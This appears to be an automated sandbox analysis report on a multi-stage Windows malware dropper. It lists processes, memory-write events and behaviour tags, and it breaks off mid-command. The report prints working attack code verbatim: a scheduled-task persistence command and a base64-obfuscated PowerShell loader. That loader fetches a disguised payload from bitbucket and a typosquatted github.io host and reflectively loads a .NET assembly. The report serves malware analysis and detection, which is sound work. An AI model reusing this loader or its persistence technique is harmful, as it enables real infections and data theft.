Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe Token: SeSecurityPrivilege 2028 4jblLC1.exe -
Suspicious use of FindShellTrayWindow 8 IoCs
pid Process 2336 fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6.exe 2700 Occupation.com 2700 Occupation.com 2700 Occupation.com 824 Seat.com 824 Seat.com 824 Seat.com 1724 zY9sqWs.exe -
Suspicious use of SendNotifyMessage 6 IoCs
pid Process 2700 Occupation.com 2700 Occupation.com 2700 Occupation.com 824 Seat.com 824 Seat.com 824 Seat.com -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2336 wrote to memory of 2720 2336 fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6.exe 31 PID 2336 wrote to memory of 2720 2336 fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6.exe 31 PID 2336 wrote to memory of 2720 2336 fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6.exe 31 PID 2336 wrote to memory of 2720 2336 fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6.exe 31 PID 2720 wrote to memory of 2988 2720 rapes.exe 33 PID 2720 wrote to memory of 2988 2720 rapes.exe 33 PID 2720 wrote to memory of 2988 2720 rapes.exe 33 PID 2720 wrote to memory of 2988 2720 rapes.exe 33 PID 2720 wrote to memory of 848 2720 rapes.exe 34 PID 2720 wrote to memory of 848 2720 rapes.exe 34 PID 2720 wrote to memory of 848 2720 rapes.exe 34 PID 2720 wrote to memory of 848 2720 rapes.exe 34 PID 848 wrote to memory of 596 848 4189e09c15.exe 36 PID 848 wrote to memory of 596 848 4189e09c15.exe 36 PID 848 wrote to memory of 596 848 4189e09c15.exe 36 PID 848 wrote to memory of 596 848 4189e09c15.exe 36 PID 2720 wrote to memory of 2028 2720 rapes.exe 37 PID 2720 wrote to memory of 2028 2720 rapes.exe 37 PID 2720 wrote to memory of 2028 2720 rapes.exe 37 PID 2720 wrote to memory of 2028 2720 rapes.exe 37 PID 2720 wrote to memory of 936 2720 rapes.exe 38 PID 2720 wrote to memory of 936 2720 rapes.exe 38 PID 2720 wrote to memory of 936 2720 rapes.exe 38 PID 2720 wrote to memory of 936 2720 rapes.exe 38 PID 2028 wrote to memory of 1652 2028 4jblLC1.exe 39 PID 2028 wrote to memory of 1652 2028 4jblLC1.exe 39 PID 2028 wrote to memory of 1652 2028 4jblLC1.exe 39 PID 2028 wrote to memory of 1652 2028 4jblLC1.exe 39 PID 1652 wrote to memory of 2532 1652 CONAtdrive.exe 40 PID 1652 wrote to memory of 2532 1652 CONAtdrive.exe 40 PID 1652 wrote to memory of 2532 1652 CONAtdrive.exe 40 PID 1652 wrote to memory of 2532 1652 CONAtdrive.exe 40 PID 2720 wrote to memory of 2324 2720 rapes.exe 42 PID 2720 wrote to memory of 2324 2720 rapes.exe 42 PID 2720 wrote to memory of 2324 2720 rapes.exe 42 PID 2720 wrote to memory of 2324 2720 rapes.exe 42 PID 936 wrote to memory of 2444 936 2cd9a90288.exe 43 PID 936 wrote to memory of 2444 936 2cd9a90288.exe 43 PID 936 wrote to memory of 2444 936 2cd9a90288.exe 43 PID 936 wrote to memory of 2444 936 2cd9a90288.exe 43 PID 936 wrote to memory of 2444 936 2cd9a90288.exe 43 PID 936 wrote to memory of 2444 936 2cd9a90288.exe 43 PID 936 wrote to memory of 2444 936 2cd9a90288.exe 43 PID 936 wrote to memory of 2444 936 2cd9a90288.exe 43 PID 936 wrote to memory of 2444 936 2cd9a90288.exe 43 PID 936 wrote to memory of 2444 936 2cd9a90288.exe 43 PID 936 wrote to memory of 2444 936 2cd9a90288.exe 43 PID 2720 wrote to memory of 2468 2720 rapes.exe 44 PID 2720 wrote to memory of 2468 2720 rapes.exe 44 PID 2720 wrote to memory of 2468 2720 rapes.exe 44 PID 2720 wrote to memory of 2468 2720 rapes.exe 44 PID 984 wrote to memory of 1692 984 taskeng.exe 47 PID 984 wrote to memory of 1692 984 taskeng.exe 47 PID 984 wrote to memory of 1692 984 taskeng.exe 47 PID 984 wrote to memory of 1692 984 taskeng.exe 47 PID 2720 wrote to memory of 1760 2720 rapes.exe 48 PID 2720 wrote to memory of 1760 2720 rapes.exe 48 PID 2720 wrote to memory of 1760 2720 rapes.exe 48 PID 2720 wrote to memory of 1760 2720 rapes.exe 48 PID 1760 wrote to memory of 1708 1760 3a084e6b3d.exe 49 PID 1760 wrote to memory of 1708 1760 3a084e6b3d.exe 49 PID 1760 wrote to memory of 1708 1760 3a084e6b3d.exe 49 PID 1760 wrote to memory of 1708 1760 3a084e6b3d.exe 49 PID 1760 wrote to memory of 1708 1760 3a084e6b3d.exe 49
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1196
-
C:\Users\Admin\AppData\Local\Temp\fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6.exe"C:\Users\Admin\AppData\Local\Temp\fb2090a5a2ffd3c24e0236493a6d3b1740d8f3ad2198db62b3da67e0868645f6.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2336 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Users\Admin\AppData\Local\Temp\10142150101\XxzH301.exe"C:\Users\Admin\AppData\Local\Temp\10142150101\XxzH301.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2988
-
-
C:\Users\Admin\AppData\Local\Temp\10142170101\4189e09c15.exe"C:\Users\Admin\AppData\Local\Temp\10142170101\4189e09c15.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:848 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 848 -s 12005⤵
- Loads dropped DLL
- Program crash
PID:596
-
-
-
C:\Users\Admin\AppData\Local\Temp\10142180101\4jblLC1.exe"C:\Users\Admin\AppData\Local\Temp\10142180101\4jblLC1.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\ProgramData\WMIsys\CONAtdrive.exe"C:\ProgramData\WMIsys\CONAtdrive.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /tn WMIsys /tr "C:\ProgramData\WMIsys\CONAtdrive.exe" /st 15:46 /du 23:59 /sc daily /ri 1 /f6⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2532
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10142200101\2cd9a90288.exe"C:\Users\Admin\AppData\Local\Temp\10142200101\2cd9a90288.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:936 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"5⤵
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2444
-
-
-
C:\Users\Admin\AppData\Local\Temp\10142210101\0102b962a1.exe"C:\Users\Admin\AppData\Local\Temp\10142210101\0102b962a1.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2324
-
-
C:\Users\Admin\AppData\Local\Temp\10142220101\516d293752.exe"C:\Users\Admin\AppData\Local\Temp\10142220101\516d293752.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2468 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"5⤵
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1780
-
-
-
C:\Users\Admin\AppData\Local\Temp\10142230101\3a084e6b3d.exe"C:\Users\Admin\AppData\Local\Temp\10142230101\3a084e6b3d.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Users\Admin\AppData\Local\Temp\10142230101\3a084e6b3d.exe"C:\Users\Admin\AppData\Local\Temp\10142230101\3a084e6b3d.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:1708 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 10206⤵
- Loads dropped DLL
- Program crash
PID:2792
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1760 -s 5005⤵
- Loads dropped DLL
- Program crash
PID:1764
-
-
-
C:\Users\Admin\AppData\Local\Temp\10142240101\m4mrV1B.exe"C:\Users\Admin\AppData\Local\Temp\10142240101\m4mrV1B.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2584 -
C:\Windows\system32\cmd.execmd.exe /c 67cc62a429f2f.vbs5⤵PID:1528
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67cc62a429f2f.vbs"6⤵PID:2684
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBo@Gc@Z@Bm@C8@a@Bm@Gc@agBl@Hc@LwBk@G8@dwBu@Gw@bwBh@GQ@cw@v@HQ@ZQBz@HQ@Mg@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@C@@d@B4@HQ@LgBk@GU@QQBt@Go@ZwBu@C8@cwBl@Gw@aQBm@F8@YwBp@Gw@YgB1@H@@Lw@y@DE@MQ@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@E0@cwBi@HU@aQBs@GQ@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2804 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfhgdf/hfgjew/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.deAmjgn/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2648
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10142260101\m4mrV1B.exe"C:\Users\Admin\AppData\Local\Temp\10142260101\m4mrV1B.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:844 -
C:\Windows\system32\cmd.execmd.exe /c 67cc62a429f2f.vbs5⤵PID:3008
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\67cc62a429f2f.vbs"6⤵PID:1500
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBo@Gc@Z@Bm@C8@a@Bm@Gc@agBl@Hc@LwBk@G8@dwBu@Gw@bwBh@GQ@cw@v@HQ@ZQBz@HQ@Mg@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0